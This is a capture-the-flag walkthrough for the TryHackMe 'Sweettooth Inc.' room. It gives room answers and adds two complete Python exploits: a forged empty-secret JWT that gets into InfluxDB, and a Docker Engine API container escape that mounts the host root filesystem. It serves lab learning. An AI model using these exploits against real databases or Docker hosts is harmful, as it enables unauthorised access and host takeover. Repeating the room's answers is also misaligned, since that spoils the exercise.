
THM Walkthrough: Sweettooth Inc.

Tags: THM, InfluxDB, JWT, Docker, PrivEsc

1.1 INTRODUCTION

In this room, I first enumerated a vulnerable database, crafted a JWT token to log in to it, and found the SSH credentials for the system there. Once I had gained a foothold, it turned out I was inside a Docker container with an exposed Docker Engine API.

1.2 ENUMERATION

Question:

  1. Do a TCP portscan. What is the name of the database software running on one of these ports?

Answer: influxdb

I ran an aggressive nmap scan (nmap -A) against the target, which identified InfluxDB listening on one of the open ports.

1.3 DATABASE EXPLORATION AND USER FLAG

Questions:

  1. What is the database user you find?

Answer: o5yY6yya

  2. What was the temperature of the water tank at 1621346400 (UTC Unix Timestamp)?

Answer: 22.5

  3. What is the highest rpm the motor of the mixer reached?

Answer: 4875

  4. What username do you find in one of the databases?

Answer: uzJk6Ry98d8C

  5. user.txt

Answer: THM

1.4 PRIVILEGE ESCALATION

Question:

  1. /root/root.txt

Answer: [THM]

Creating a JWT token:
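How the forged token works, as an added example that is not code from the original walkthrough. InfluxDB 1.x accepts HS256 bearer tokens carrying a `username` claim and an `exp` claim; when the daemon's `[http] shared-secret` setting is left empty, signatures are checked against the empty string, so a token signed with `b""` is accepted (CVE-2019-20933). The target address, the database names and the measurement/field names in the queries are assumptions; only the database user `o5yY6yya` comes from the page. The `epoch=s` query parameter is the practical fix for the timestamp confusion: it makes the API return Unix seconds instead of RFC3339 strings, so the 1621346400 comparison is direct.

```python
"""Forge an InfluxDB 1.x JWT (empty shared secret) and query /query with it."""
import base64
import hashlib
import hmac
import json
import time
import urllib.parse
import urllib.request
from typing import Optional

INFLUX_URL = "http://10.10.10.10:8086"   # assumed target address, not from the page
DB_USER = "o5yY6yya"                     # database user found during enumeration


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWT segments require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url: restore the padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_token(username: str, exp: int, secret: bytes = b"") -> str:
    """Build header.payload.signature; InfluxDB rejects tokens without `exp`."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps({"username": username, "exp": exp}, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    signature = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(signature)}"


def verify_token(token: str, secret: bytes = b"") -> Optional[dict]:
    """Server-side check: recompute the HMAC under the server's secret and test exp.
    Used here to confirm the forged token validates when that secret is empty."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header, payload, signature = parts
    expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature)):
        return None
    claims = json.loads(b64url_decode(payload))
    if claims.get("exp", 0) < time.time():
        return None
    return claims


def query_url(base: str, db: str, q: str) -> str:
    """Build a /query URL; epoch=s returns timestamps as Unix seconds."""
    return f"{base}/query?" + urllib.parse.urlencode({"db": db, "q": q, "epoch": "s"})


def influx_query(base: str, token: str, db: str, q: str) -> dict:
    """Run an InfluxQL statement with the forged token as a bearer token."""
    req = urllib.request.Request(query_url(base, db, q),
                                 headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


if __name__ == "__main__":
    token = make_token(DB_USER, int(time.time()) + 3600)
    print(influx_query(INFLUX_URL, token, "", "SHOW DATABASES"))
    # Database, measurement and field names below are placeholders; take the
    # real ones from SHOW MEASUREMENTS / SHOW FIELD KEYS on each database.
    print(influx_query(INFLUX_URL, token, "tanks",
                       "SELECT * FROM water_tank WHERE time = 1621346400s"))
    print(influx_query(INFLUX_URL, token, "mixer",
                       "SELECT MAX(rpm) FROM motor"))
```

The `WHERE time = 1621346400s` literal is InfluxQL's epoch-with-unit syntax, so the query itself can be written in Unix seconds without converting to RFC3339 first.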

Logging in over SSH and checking the misconfigured permissions:

Getting the shell:

Viewing the root contents:

1.5 ESCAPE

Question:

  1. The second /root/root.txt

Answer: [THM]
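The standard way to turn an exposed Docker Engine API into host root, as an added example rather than the room's own steps: ask the daemon to run a new container with the host's `/` bind-mounted, then read the host's `/root/root.txt` through that mount. The API endpoint (Unix socket or TCP), the image name and the assumption that the API answers unauthenticated from inside the container are all assumptions; the page only states that the API was exposed. The log demultiplexer is needed because, without a TTY, the logs endpoint returns 8-byte frame headers in front of each stdout/stderr chunk.

```python
"""Escape a container via the Docker Engine API by bind-mounting the host root."""
import http.client
import json
import socket
import struct
import urllib.parse

# Assumed: where the API is reachable from inside the container.
DOCKER_API = "unix:///var/run/docker.sock"   # or e.g. "tcp://127.0.0.1:2375"
IMAGE = "alpine"        # assumed: any image already present on the host works
API_VERSION = "v1.24"   # old enough to be accepted by every current daemon


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTPConnection that talks to a Unix socket instead of a TCP port."""

    def __init__(self, path: str):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def connect(endpoint: str) -> http.client.HTTPConnection:
    """Open a connection for either unix:///path or tcp://host:port."""
    u = urllib.parse.urlparse(endpoint)
    if u.scheme == "unix":
        return UnixHTTPConnection(u.path)
    return http.client.HTTPConnection(u.hostname, u.port or 2375)


def create_request(image: str, cmd: list, host_root: str = "/") -> dict:
    """Payload for POST /containers/create: mount the host's / at /host and run cmd.
    A bind mount is enough to read host files; Privileged is not required."""
    return {"Image": image, "Cmd": cmd,
            "HostConfig": {"Binds": [f"{host_root}:/host"]}}


def demux_logs(raw: bytes) -> tuple:
    """Split the multiplexed log stream: frames of [type, 0, 0, 0, len(BE32)] + payload,
    where type 1 is stdout and type 2 is stderr."""
    out, err, i = b"", b"", 0
    while i + 8 <= len(raw):
        stream = raw[i]
        size = struct.unpack(">I", raw[i + 4:i + 8])[0]
        chunk = raw[i + 8:i + 8 + size]
        if stream == 2:
            err += chunk
        else:
            out += chunk
        i += 8 + size
    return out, err


def api(conn, method: str, path: str, body=None) -> tuple:
    """One versioned API call; returns (status, raw response body)."""
    data = json.dumps(body).encode() if body is not None else None
    headers = {"Content-Type": "application/json"} if data else {}
    conn.request(method, f"/{API_VERSION}{path}", body=data, headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read()


def run_on_host(endpoint: str, cmd: list) -> tuple:
    """Create, start, wait for and remove a throwaway container; return its output."""
    conn = connect(endpoint)
    status, body = api(conn, "POST", "/containers/create", create_request(IMAGE, cmd))
    if status != 201:
        raise RuntimeError(f"create failed: {status} {body!r}")
    cid = json.loads(body)["Id"]
    api(conn, "POST", f"/containers/{cid}/start")
    api(conn, "POST", f"/containers/{cid}/wait")          # blocks until exit
    _, logs = api(conn, "GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
    api(conn, "DELETE", f"/containers/{cid}")
    return demux_logs(logs)


if __name__ == "__main__":
    out, err = run_on_host(DOCKER_API, ["cat", "/host/root/root.txt"])
    print(out.decode(errors="replace"), err.decode(errors="replace"))
```

Reading a file is the minimal demonstration; the same bind mount lets the attacker write to `/host/etc/` or drop a key into `/host/root/.ssh/`, which is why an API socket reachable from an unprivileged container is equivalent to root on the host.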

1.6 CONCLUSIONS

In the Sweettooth Inc. module, I successfully identified a vulnerable influxdb database and crafted a JWT token to gain access, retrieving SSH credentials to the system. This led to a Docker environment with an exposed API, enabling me to escalate privileges and retrieve critical information, including the user.txt flag.

While tackling this module, I faced challenges with timestamp conversions and privilege escalation within the Docker environment. With focused enumeration and database analysis, I resolved these issues.

Completion Screenshot: